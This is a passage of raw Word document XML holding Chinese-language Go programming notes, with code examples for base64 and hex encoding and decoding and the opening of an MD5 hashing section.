      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">err != </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">nil </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>cw.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Flush</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cw.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C991A" w14:textId="536061BA" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F6AE6A" w14:textId="3FD10DF0" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码解码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E780CA1" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E53447" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C5246" w14:textId="7F7A714B" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"encoding/base64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51C834" w14:textId="1965FFF7" w:rsidR="00D562AB" w:rsidRPr="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCC7AAD" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CEAE58" w14:textId="5E5D8478" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>input := []byte("hello golang base64")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C034068" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CAB8D6" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>演示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC714F" w14:textId="7321C886" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    encodeString := base64.StdEncoding.EncodeToString(input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A511E" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRPr="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对上面的编码结果进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>解码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0826CBE3" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    decodeBytes, err := base64.StdEncoding.DecodeString(encodeString)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53686ABA" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D3424D" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        log.Fatalln(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA370EB" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DA26B" w14:textId="4F2FC541" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fmt.Println(string(decodeBytes))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E34113" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6532FE3A" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRPr="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果要用在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中，需要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D562AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>URLEncoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FE9B5" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    uEnc := base64.URLEncoding.EncodeToString([]byte(input))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C5C182" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fmt.Println(uEnc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719D82B2" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ABEB23" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    uDec, err := base64.URLEncoding.DecodeString(uEnc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58687CF3" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E4AF2" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        log.Fatalln(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE097E" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9DD848" w14:textId="4D1F0FF9" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    fmt.Println(string(uDec))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F4E74" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D0CFC4" w14:textId="1A169FE2" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D562AB">
        <w:t>encoding/hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF7719D" w14:textId="731DA120" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B25BCBB" w14:textId="36A4DE78" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D562AB">
        <w:t>out := make([]byte, len(plaintext))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069845FD" w14:textId="1C329520" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D562AB">
        <w:t>hex.EncodeToString(out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155CC5D8" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA5A0D7" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B45D683" w14:textId="6361B68B" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2060D" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六进制字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050EC5D1" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>hexString := "48656c6c6f2c20476f2e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C79308" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6064E8" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码十六进制字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C11AA" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>decoded, err := hex.DecodeString(hexString)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280E8A7D" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E3AE2F" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21AC98" w14:textId="499E1392" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01112B24" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12853172" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64540AC5" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="347" w:name="_Toc159779803"/>
      <w:r w:rsidRPr="00D562AB">
        <w:t>crypto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>
    </w:p>
    <w:p w14:paraId="4DCD0554" w14:textId="77777777" w:rsidR="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698D9B9D" w14:textId="77777777" w:rsidR="00380023" w:rsidRPr="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1045876A" w14:textId="590162C5" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>d5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BFF44E" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F24ABE9" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE3DE8A" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDD2641" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B116874" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"crypto/md5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0DFA4" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"encoding/hex"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF06495" w14:textId="77777777" w:rsidR="00D562AB" w:rsidRDefault="00D562AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
